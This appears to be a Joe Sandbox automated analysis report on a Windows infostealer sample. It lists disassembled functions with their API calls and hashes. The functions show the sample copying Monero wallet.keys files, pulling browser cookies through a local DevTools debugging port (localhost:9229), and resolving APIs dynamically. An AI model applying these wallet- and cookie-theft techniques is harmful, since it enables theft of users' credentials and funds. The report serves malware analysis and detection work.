                                                    • Instruction ID: 85a202be0afad24316839f0fabb8884f217e35aabd054fc1c1656b3b9246e251
                                                    • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction Fuzzy Hash: E2011D75A41305AFD7119BA4DC55FBFBB79EB44700F104559FA04AB380DBB09A00CBE4
                                                    Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
                                                    • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                    • String ID:
                                                    • API String ID: 4291131564-0
                                                    • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                    • Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
                                                    • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                    • Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4
                                                    Function 0249CE47 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0249CE6D
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0249CEAD
                                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 0249CF30
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                                    • String ID:
                                                    • API String ID: 1940255200-0
                                                    • Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                    • Instruction ID: f406b6ff3d1d268229d91bc99960c9f0a908bf83be7ac0c0c0cc5ad8be3b830b
                                                    • Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                    • Instruction Fuzzy Hash: C0315271A40615BFDB10DB94CC81FAAB7B9AB88B54F504185FA04EB2D0D7B0AE45CBE0
                                                    Function 024A33F7 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2452939696-0
                                                    • Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
                                                    • Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
                                                    • Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
                                                    • Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5
                                                    Function 024A9A93 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                    • Instruction ID: e63ffb5fa32e55edb1d317d74778b45096babdf029b2fc40e30f77f6f01eac84
                                                    • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                    • Instruction Fuzzy Hash: BF71D631411B049BD7F33BB2DD21A4EFAA37F24701F10491EA1DA22DB49E326965DF51
                                                    Function 024820E0 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02482106
                                                    • lstrlen.KERNEL32(006389F0), ref: 02482115
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02482142
                                                    • lstrcat.KERNEL32(00000000,?), ref: 0248214A
                                                    • lstrlen.KERNEL32(00431D64), ref: 02482155
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482175
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 02482181
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024821A9
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024821B4
                                                    • lstrlen.KERNEL32(00431D64), ref: 024821BF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024821DC
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 024821E8
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482213
                                                    • lstrlen.KERNEL32(?), ref: 0248224B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248226B
                                                    • lstrcat.KERNEL32(00000000,?), ref: 02482279
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024822A0
                                                    • lstrlen.KERNEL32(00431D64), ref: 024822B2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024822D2
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 024822DE
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482304
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248230F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248233B
                                                    • lstrlen.KERNEL32(?), ref: 02482351
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482371
                                                    • lstrcat.KERNEL32(00000000,?), ref: 0248237F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024823A9
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024823E6
                                                    • lstrlen.KERNEL32(00638CA4), ref: 024823F4
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482418
                                                    • lstrcat.KERNEL32(00000000,00638CA4), ref: 02482420
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248245E
                                                    • lstrcat.KERNEL32(00000000), ref: 0248246B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482494
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 024824BD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024824E9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482526
                                                    • DeleteFileA.KERNEL32(00000000), ref: 0248255E
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 024825AB
                                                    • FindClose.KERNEL32(00000000), ref: 024825BA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                                    • String ID:
                                                    • API String ID: 2857443207-0
                                                    • Opcode ID: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
                                                    • Instruction ID: f944d3e6008f80054e83f913bf64ac504e87c82e67d04d0e56dd45a3ee5cd3a3
                                                    • Opcode Fuzzy Hash: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
                                                    • Instruction Fuzzy Hash: 5FE15371A21296ABDB21FF75CC84A9E77FAAF44309F04442AEC05A7211DBB4DD41DFA0
                                                    Function 00401070 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0040108A
                                                      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                      • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                      • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                      • Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004010A0
                                                    • lstrlenA.KERNEL32(?), ref: 004010AD
                                                    • lstrcatA.KERNEL32(?,.keys), ref: 004010C8
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
                                                    • lstrlenA.KERNEL32(009485A8), ref: 0040110D
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401131
                                                    • lstrcatA.KERNEL32(00000000,009485A8), ref: 00401139
                                                    • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
                                                    • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
                                                    • lstrlenA.KERNEL32(0094E9E8), ref: 004011EE
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401215
                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040121D
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
                                                    • lstrcatA.KERNEL32(00000000), ref: 00401265
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004012E1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040131D
                                                      • Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                    • DeleteFileA.KERNEL32(?), ref: 00401351
                                                    • memset.MSVCRT ref: 0040136E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                                    • String ID: .keys$\Monero\wallet.keys
                                                    • API String ID: 2734118222-3586502688
                                                    • Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                    • Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
                                                    • Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                    • Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8
                                                    Function 02495E47 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495E7C
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02495EAB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495EDC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F04
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02495F0F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F37
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F6F
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02495F7A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F9F
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495FD5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495FFD
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02496008
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249602F
                                                    • lstrlen.KERNEL32(00431D64), ref: 02496041
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496060
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 0249606C
                                                    • lstrlen.KERNEL32(00638DD8), ref: 0249607B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249609E
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024960A9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024960D3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024960FF
                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 02496106
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249615E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024961CD
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024961FF
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02496242
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249626E
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024962A6
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02496318
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249633C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                                    • String ID:
                                                    • API String ID: 2428362635-0
                                                    • Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                    • Instruction ID: 92614380f2631f25b9eec11e28201b7e7f238b15a9351214646fd83939b0b752
                                                    • Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                    • Instruction Fuzzy Hash: 23029170A11255ABDF21EF79CC88AAF7BFAAF44304F15452AE805A7350DB74D941CF90
                                                    Function 02496B07 Relevance: 43.9, APIs: 29, Instructions: 437stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02496B3C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02496B77
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02496BA1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496BD8
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496BFD
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02496C05
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496C2E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$FolderPathlstrcat
                                                    • String ID:
                                                    • API String ID: 2938889746-0
                                                    • Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
                                                    • Instruction ID: c34a19a017d7659214b0e874e2527225c4bfbd69b746a3547e2cd5adc3c39dd7
                                                    • Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
                                                    • Instruction Fuzzy Hash: F2F1B070A11256ABDF21EF79CC48BAF7BBAAF44308F05452AE81597350DB78D942CF90
                                                    Function 004092E0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 365stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                      • Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                      • Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
                                                      • Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155
                                                    • strlen.MSVCRT ref: 00409311
                                                    • strlen.MSVCRT ref: 0040932A
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                      • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                      • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                    • memset.MSVCRT ref: 00409371
                                                    • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004093A2
                                                    • strlen.MSVCRT ref: 004093C9
                                                    • strlen.MSVCRT ref: 00409416
                                                    • memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
                                                    • memset.MSVCRT ref: 00409562
                                                    • lstrcatA.KERNEL32(?,cookies), ref: 00409577
                                                    • lstrcatA.KERNEL32(?,00431D64), ref: 00409589
                                                    • lstrcatA.KERNEL32(?,?), ref: 0040959A
                                                    • lstrcatA.KERNEL32(?,00435160), ref: 004095AC
                                                    • lstrcatA.KERNEL32(?,?), ref: 004095BD
                                                    • lstrcatA.KERNEL32(?,.txt), ref: 004095CF
                                                    • lstrlenA.KERNEL32(?), ref: 004095E6
                                                    • lstrlenA.KERNEL32(?), ref: 0040960B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00409644
                                                    • memset.MSVCRT ref: 0040968C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                    • API String ID: 2819545660-3542011879
                                                    • Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                    • Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
                                                    • Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                    • Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98
                                                    Function 024A1E37 Relevance: 39.2, APIs: 26, Instructions: 192stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 024A6680
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 024A6699
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024A66B1
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024A66C9
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024A66E2
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024A66FA
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 024A6712
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 024A672B
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 024A6743
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 024A675B
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 024A6774
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 024A678C
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024A67A4
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A1E76
                                                    • GetUserDefaultLangID.KERNEL32 ref: 024A1E7C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$DefaultLangUserlstrcpy
                                                    • String ID:
                                                    • API String ID: 4154271814-0
                                                    • Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                    • Instruction ID: a1ded28f3ab14affb8986767e9c2ccdd308ce34eae8202968dbe82225f74c990
                                                    • Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                    • Instruction Fuzzy Hash: C961B130501256AFDB21AF71CC98B6F7ABBAF55749F04102AF90A93260DFB4D801DF60
                                                    Function 02489A03 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 238stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A3F
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A54
                                                    • lstrcat.KERNEL32(?,0043516C), ref: 02489A67
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • wsprintfA.USER32 ref: 02489AAD
                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02489AD0
                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02489AEF
                                                    • memset.MSVCRT ref: 02489B0D
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B22
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B34
                                                    • lstrcat.KERNEL32(?,00435128), ref: 02489B44
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02489B81
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02489BB7
                                                    • StrStrA.SHLWAPI(?,00638C5C), ref: 02489BCC
                                                    • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02489BE9
                                                    • lstrlen.KERNEL32(?), ref: 02489BFD
                                                    • wsprintfA.USER32 ref: 02489C0D
                                                    • lstrcpy.KERNEL32(?,?), ref: 02489C24
                                                    • memset.MSVCRT ref: 02489C3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                    • String ID: D
                                                    • API String ID: 171495903-2746444292
